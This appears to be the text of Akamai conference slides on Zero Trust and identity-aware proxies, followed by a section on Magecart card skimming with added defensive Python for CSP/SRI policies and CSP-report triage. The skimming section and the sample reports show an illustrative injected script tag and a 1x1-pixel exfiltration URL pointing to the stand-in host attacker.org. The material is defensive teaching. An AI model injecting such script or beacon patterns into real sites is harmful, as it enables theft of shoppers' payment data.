Access Denied! Decoding Identity Aware Proxies

Users & Corporate Apps Have Left The Building
(Diagram labels: CORP NET, DC, App #1, App #2, App #3 ... App #n, The Web, SaaS, IaaS, Office, Cafe, Complex, Slow, High Risk)
- Existing network architectures are not optimized for this
- No VPN = No Security

There is no INSIDE

Security Challenges In This Environment
- Larger Attack Surface: Direct Internet Access (DIA), SaaS, cloud services, mobility and IoT all dramatically increase your attack surface
- Advanced Threats: Threats are becoming more complex and increasing in volume, and adversaries are now adept at bypassing your defences
- Security Complexity: Security complexity and control point complications have created security gaps
- Security Skills: Worldwide shortage of security talent and expertise means many security teams are stretched

Zero Trust is the new approach
Key principles:
- The network is always assumed to be hostile.
- External and internal threats exist on the network at all times.
- Network locality is not sufficient for deciding trust in a network.
- Every device, user, and network flow is authenticated and authorized.
- Policies must be dynamic and calculated from as many sources of data as possible.

Different Approaches To Implement Zero Trust
- Option #1: Network Segmentation
- Option #2: Software Defined Perimeters
- Option #3: Identity Aware Proxies

Network Segmentation
- Advantages: Great for protection from East-West lateral movement
- Drawbacks: Fragile & complicated; Expensive; Shared resources used by the entire enterprise; Even more complex to implement in hybrid IaaS / on-prem; Often implemented within the corp WAN

Software Defined Perimeters
- Advantages: Familiar, most similar to legacy remote access VPN; Relatively fast to eliminate VPN
- Drawbacks: Limited architecture, a tunnel is just a tunnel; Service insertion not possible due to tunnel architecture; Pushes complexity with legacy auth down to each application

Identity Aware Proxy (IAP)
- Cloud-based proxy architecture
- Identity verification and authorization occur in the cloud based on least-access principles
- No tunnels: IAP provides access to applications, whitelisted for authenticated and authorized users, at the application layer (Layer 7)
- Standard HTTPS or WebSockets over TLS
- Trusted identity store to verify users and devices
- Cloaks the applications and assets in the cloud or behind the firewall
- Clientless for web apps

Identity Aware Proxy Advantages
- Long-term flexibility with proxy architecture
- Service insertion for features like WAF, CDN, etc.
- Auth bridging: unify multiple islands of identity
- Future capabilities likely to include password vaulting and shared accounts
Drawbacks
- More of a departure for helpdesk support compared to network-centric solutions
- Can be more work to get started

Identity Aware Proxy (IAP) - Architecture
(Diagram: Enterprise Data Center with Apps and the Enterprise Access Connector; Proxy Cloud Platform with the IAP Edge; IAP Management Cloud; actors: App User, Admin User / Customer Admin User)
- TLS connection from user to IAP Edge
- Outbound TLS connection from Connector to EAA Edge
- Outbound TLS connection from Connector to Proxy Management Cloud
- TLS connection from Customer Admin User to IAP Management Cloud

Enterprise Access Connector
(Diagram: Enterprise Access Edge on the Internet; inside the enterprise, Apps and AD / LDAP behind the Enterprise Access Connector and an outbound proxy)
- Centrally managed virtual machine
- Only dials out - all inbound access is denied
- Proxies connections to internal apps
- Can translate SSH, RDP/VNC to HTTP/S
- Communicates with your Active Directory/LDAP
- Supports full ADC functionality including load balancing, custom headers, path-based routing, and authentication bridging

Enterprise Access Connector - Authentication Flow
(Diagram: Enterprise Access Edge on the Internet, Enterprise Access Connector in the enterprise; labels: TLS Connection, CSR, Approval, Approved Certificate)
1. Connector initiates a mutually authenticated TLS connection using its factory certificate (EAA Management)
2. Akamai authenticates itself using the Akamai certificate (EAA Management)
3. Customer must approve the Connector
4. Connector creates a CSR; sends to Akamai
5. Akamai signs CSR; sends approved certificate
6. Connector tears down existing TLS connection
7. Connector initiates a mutually authenticated TLS connection using approved certificate (EAA Management)
8. Akamai authenticates itself using the approved certificate (EAA Management)
9. Connector initiates a mutually authenticated TLS connection using approved certificate (EAA Edge)
10. Akamai authenticates itself using the approved certificate (EAA Edge)

Authentication and Authorization
(Diagram: User -> EAA Edge on the Internet -> Enterprise Connector -> Apps and AD / LDAP in the enterprise; IdP (IDaaS, e.g. Okta, OneLogin) on the Internet)
- EAA Edge will authenticate the user against AD
- Provides single sign-on capabilities
- Provides multi-factor authentication
- Can integrate with IDaaS providers
- Supports NTLM, Kerberos, SAML, header-based auth
- Seamless integration for any authentication source

User Data Path
(Diagram: User attempting to access application -> Enterprise Access Edge on the Internet -> Enterprise Access Connector in the enterprise; SSL sessions for configured applications)
- End user requests access to an application
- Enterprise Access Edge: Only accepts SSL traffic for configured applications. Must be from authenticated and authorized users. All other traffic is dropped.

Validate user identity to control access to assets
AUTHENTICATION
- Verified Individual - MFA OTP
- Identified Individual - username / password
- Trusted Device - client certificates
Authorised Applications

User Data Path
(Diagram: User attempting to access application -> Enterprise Access Edge on the Internet -> Enterprise Access Connector -> Apps in the enterprise; SSL sessions for configured applications; the connector passes user requests to the intended application)
- End user requests access to an application
- Enterprise Access Edge: Only accepts SSL traffic for configured applications. Must be from authenticated and authorized users. All other traffic is dropped.
- Enterprise Access Connector: Only processes HTTP messages received over self-initiated SSL sessions. Messages may only be directed toward applications the connector is configured for. Passes user requests to the intended application. Also provides authentication and authorization for all users.

Cloud Based - High Availability & Reliability
(Diagram: Enterprise user -> Internet -> Global DNS -> Enterprise Access Edges -> Enterprise Access Connectors -> Customer Applications)
Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
- All components must be elastic and redundant: Enterprise Access Edges, Enterprise Access Connectors, Customer Applications
- Built-in server and data center load balancing
- Regional Enterprise Access Edges with automatic failover
- Redundant Enterprise Access Connectors

Identity Aware Proxy (IAP) Architecture Summary
(Diagram: Clientless - User > Browser over TLS to EAA on the Internet, with the EAA SAML IDP on the auth path only and SaaS; With Client - User > Desktop Apps > EAA Client to EAA DPoP on the auth & data path; EAA Connectors in front of Apps in an IaaS VPC and in front of Apps and AD in the Data Center)
- Auth-N, Auth-Z before connect
- Secured data path
- Integrated HA, load balancing
- Multiple IDP support
- SSO and auth bridging
- Managed & unmanaged devices

IAP Complements Network Segmentation
(Diagram: Clientless - User > Browser over TLS, and With Client - User > Desktop Apps > EAA Client, both via EAA DPoP on the Internet; Data Center with Segment 1 / App 1 through Segment 4 / App 4 and AD)
- No limit on number of connectors
- Simplify micro-segmentation
- Network level for coarse segmentation
- IAP for fine-grained per-app segmentation

Moving Beyond Perimeter Security
A comprehensive & achievable roadmap to less risk
8 Steps To Zero Trust:
1. App Precheck
2. Access Proxy Prep
3. Test Lab Enrollment
4. Security Upgrade
5. Performance Upgrade
6. External User Enrollment
7. Internal User Enrollment
8. VLAN Migration
- 8 Steps To Zero Trust: A comprehensive guide & roadmap to Zero Trust by Akamai CTO Charlie Gero
- Zero Trust Ref. Architecture: Simple visual guide on how to apply Zero Trust across common environments
akamai.com/zerotrust

THANK YOU nhawkins@akamai.com https://www.linkedin.com/in/nickhawk @SingaporeNick

Magecart and JavaScript skimmer code

Magecart: a group of criminals that have been targeting online shopping carts and skimming credit card data at checkout.
- Time in operation: Roughly 3 years
- Group strength: Unknown, roughly operate in 6-7 groups
- Target industry: ecommerce (primarily)
- Modus operandi: JavaScript skimmers/malware
Many of the Magecart victims are struggling to contain the attacks. In the third quarter of 2018 many Magecart victims were re-infected soon after detection and clean-up of the initial infection.
Intelligent Edge Security 2018 Akamai

Understanding Magecart (Data Skimming) Kill Chain
- Reconnaissance: Identify target website with high account value; Identify random targets
- Infiltration: Implanting server side skimmer code; Implanting client-side malware/plugins
- Exploitation: Checkout page compromised; Skimmer.js executes; Skimming of web form fields such as credit card number, expiration date, name, billing address, etc.
- Exfiltration: Data packaging and exfiltration to the attacker location

DOORS TO DATA SKIMMING
How did the script/skimmer get in?

TRUST EXPLOITATION

Authorized user injecting malicious script
- Insider threat: a user who legitimately has access to include scripts on the websites intentionally adds a malicious payload.
- Unknowingly: valid users doing A/B tests, CMS upgrades etc. open up security holes
(Diagram: Checkout Script)

Unauthorized user injecting malicious script
- Accidental exposure: formal practices and controls are usually unaware of all of the injection points
- Web attackers: Stored Cross-Site Scripting (XSS); Reflected Cross-Site Scripting (XSS); Application modification using other vulnerabilities; Targeting 3rd party integrations and partners

Client side Malware, Plug-ins
1. User browser making legitimate requests to vulnerable site/s
2. Browser side logic such as compromised browser plugins can manipulate content on the browser side
3. Card data and user info is skimmed, stored and sent to the attacker location

What does the attack look like in reality?
- User Interaction: www.xyz.com/cart/checkout.jsp
- Infiltration: www.xyz.com/cart/checkout.jsp includes a piece of JavaScript: <script src=www.attacker.org/credit-card-skimmer.js>
- Exploitation: credit-card-skimmer.js runs and extracts payment details such as card number, expiration, name and billing address
- Exfiltration: www.attacker.org/1x1-pixel.gif?stolendata=1234567891234 nov 2020 a%20name a%20billing%20address

EXAMPLE: INLINE JAVASCRIPT SKIMMER


DATA EXFILTRATION: INLINE JAVASCRIPT SKIMMER

EXAMPLE: EXTERNAL JAVASCRIPT SKIMMER


Where do we go from here?

Zero Trust approach can help: Trust, but verify
- Users & apps are everywhere
- Trust, but verify
- Access only to authorized apps and resources

PROTECT YOUR SENSITIVE PAGES
Sensitive pages: Login, Payment, Profile
- Auth + data path controls
- Application layer protection
- Content Security Policy (CSP) and SRI
- Script management

CORPORATE APPLICATION MODERNIZATION - Reference architecture
(Diagram: Browser, Client and Attacker reach an Edge platform providing DDoS / WAF, Identity, App access, App acceleration and Manage functions, in front of Corporate apps hosted in the Data Centre, Cloud Provider X and Cloud Provider Y; callouts 1-7)

DEFENSE IN DEPTH - CSP AND SRI CONTROLS
Content Security Policy
- Disallow / selectively allow inline and external JavaScript with script-src
- Use of CSP nonces
- Validating inline JavaScript with CSP hashes
Subresource Integrity (SRI)
- Validating external JavaScript by specifying an integrity attribute on your script calls
- CSP and SRI together with a new CSP directive called require-sri-for
Data Exfiltration Defenses
- Control XMLHttpRequest (XHR) based exfiltration with CSP connect-src
- Control exfiltration with the Image() constructor using CSP img-src
- Implement CSP violation reporting
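The CSP and SRI controls listed above, worked through as an added example that is not from the slides or from Akamai: it computes the hash source for an inline script and the SRI integrity value for an external one, assembles a checkout-page policy whose connect-src and img-src confine XHR and image-beacon requests to the page's own origin, and checks sample URLs against that policy. The script bodies and hostnames are constructed, and the host-source matcher is a simplified illustration of CSP matching, not a full implementation.

```python
import base64
import hashlib
import secrets
from urllib.parse import urlparse

# Constructed sample content for a checkout page (not from the slides):
INLINE_SCRIPT = "document.getElementById('pay').addEventListener('submit', validate);"
VENDOR_SCRIPT = b"window.cartWidget = function () { /* trusted vendor code */ };"

def csp_hash(source: str, algo: str = "sha256") -> str:
    """CSP hash-source for inline JavaScript: '<algo>-<base64 digest of the exact text>'."""
    digest = hashlib.new(algo, source.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"

def sri_integrity(body: bytes, algo: str = "sha384") -> str:
    """Value for the integrity= attribute of an external <script> tag."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"

def sri_matches(body: bytes, integrity: str) -> bool:
    """The browser-side SRI check: recompute with the named algorithm and compare."""
    algo = integrity.split("-", 1)[0]
    return secrets.compare_digest(sri_integrity(body, algo), integrity)

def build_csp(nonce: str, inline_hashes, script_hosts, report_uri="/csp-report") -> str:
    """Policy for a sensitive page: scripts run only by nonce, hash or listed host; XHR/fetch
    (connect-src) and images (img-src) may only reach our own origin, so the XHR and
    1x1-pixel exfiltration channels are blocked and reported. Use a fresh nonce per response."""
    script_src = ["'self'", f"'nonce-{nonce}'"]
    script_src += [f"'{h}'" for h in inline_hashes] + list(script_hosts)
    return "; ".join([
        "default-src 'self'",
        "script-src " + " ".join(script_src),
        "connect-src 'self'",
        "img-src 'self'",
        "require-sri-for script",  # named in the slides; browser support stayed experimental
        f"report-uri {report_uri}",
    ])

def allowed_by(policy: str, directive: str, url: str, page_origin: str) -> bool:
    """Simplified host-source check: does `directive` (falling back to default-src)
    permit a load from `url`? Keyword sources other than 'self' are ignored here."""
    sources = {}
    for d in policy.split(";"):
        parts = d.split()
        if parts:
            sources[parts[0]] = parts[1:]
    host = urlparse(url).netloc
    for s in sources.get(directive, sources.get("default-src", [])):
        if s == "'self'" and host == urlparse(page_origin).netloc:
            return True
        if not s.startswith("'") and urlparse(s).netloc == host:
            return True
    return False
```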
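The last bullet, CSP violation reporting, only helps if someone reads the reports; here is an added triage example (not from the slides or Akamai) that scores browser violation reports the way the kill chain above suggests: a blocked script load or a blocked image/XHR request to a foreign host from a checkout, login or payment page is treated as a possible skimmer. The reports, the sensitive-path list and the site's own hostnames are constructed assumptions.

```python
import json
from urllib.parse import urlparse

# Constructed CSP violation reports in the JSON shape a browser POSTs to report-uri
# (not real reports; the attacker host is the placeholder used in the slides):
SAMPLE_REPORTS = [
    '{"csp-report": {"document-uri": "https://www.xyz.com/cart/checkout.jsp",'
    ' "effective-directive": "img-src", "violated-directive": "img-src",'
    ' "blocked-uri": "https://www.attacker.org/1x1-pixel.gif?stolendata=REDACTED"}}',
    '{"csp-report": {"document-uri": "https://www.xyz.com/cart/checkout.jsp",'
    ' "effective-directive": "script-src", "violated-directive": "script-src",'
    ' "blocked-uri": "https://www.attacker.org/credit-card-skimmer.js"}}',
    '{"csp-report": {"document-uri": "https://www.xyz.com/blog/post-1",'
    ' "effective-directive": "img-src", "violated-directive": "img-src",'
    ' "blocked-uri": "https://images.example.net/banner.png"}}',
]

SENSITIVE_PATHS = ("/cart/checkout", "/login", "/account/payment")  # assumed site layout
EXFIL_DIRECTIVES = {"img-src", "connect-src"}  # the two channels the slides call out

def triage(report_json: str, own_hosts: set) -> dict:
    """Score one report: where it happened (sensitive page?), what was blocked (a script load
    or an outbound image/XHR request), and whether the destination is one of our own hosts."""
    r = json.loads(report_json)["csp-report"]
    doc = urlparse(r.get("document-uri", ""))
    # effective-directive is the one actually enforced; violated-directive may carry sources
    directive = (r.get("effective-directive") or r.get("violated-directive") or "unknown").split()[0]
    blocked = r.get("blocked-uri", "")
    blocked_host = urlparse(blocked).netloc  # "inline" / "eval" parse to an empty host
    sensitive = doc.path.startswith(SENSITIVE_PATHS)
    foreign = bool(blocked_host) and blocked_host not in own_hosts
    if directive == "script-src" and foreign:
        severity, reason = ("high" if sensitive else "medium"), "unapproved external script"
    elif directive in EXFIL_DIRECTIVES and foreign and sensitive:
        severity, reason = "high", "possible data exfiltration from a sensitive page"
    elif directive == "script-src" and blocked == "inline":
        severity, reason = ("high" if sensitive else "low"), "inline script without nonce or hash"
    else:
        severity, reason = "low", "other violation"
    return {"severity": severity, "reason": reason, "page": doc.path,
            "directive": directive, "blocked_host": blocked_host}

def high_severity(reports, own_hosts: set) -> list:
    """Return the triaged reports that should page someone."""
    return [t for t in (triage(r, own_hosts) for r in reports) if t["severity"] == "high"]
```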

THANK YOU